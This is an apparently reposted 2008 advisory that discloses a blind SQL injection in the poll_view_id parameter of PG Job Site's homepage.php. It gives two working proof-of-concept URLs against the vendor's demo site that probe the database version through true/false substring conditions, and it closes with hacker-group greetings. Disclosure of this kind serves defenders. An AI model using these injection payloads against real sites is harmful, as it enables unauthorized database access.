PG Job Site (poll_view_id) Blind SQL Injection Vulnerability
2008-11-23 22:00:03[~] PG Job Site homepage.php (poll_view_id) Blind Sql inj.
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu msn: [email protected]
[~]
[~] Date: 23.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] Kucuk Bir Rica: Lutfen DemolarĂ½ Hacklemeyin ( pls dont make hack demos )
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] N0T: a.q a.q a.q a.q a.q a.q a.q a.q a.q limit(a.q)=sonsuz ( bIktIm )
[~] -----------------------------------------------------------
exploit for demo: ( you must login to site after you test this links. you look left for two link)
http://www.jobsoftpro.com/demo/homepage.php?action=results&poll_ident=6&poll_view_id=6+and+substring(@@version,1,1)=4 ( true )
http://www.jobsoftpro.com/demo/homepage.php?action=results&poll_ident=6&poll_view_id=6+and+substring(@@version,1,1)=5 ( false )
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org & darkc0de.com
[~]
[~]----------------------------------------------------------------------
#
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.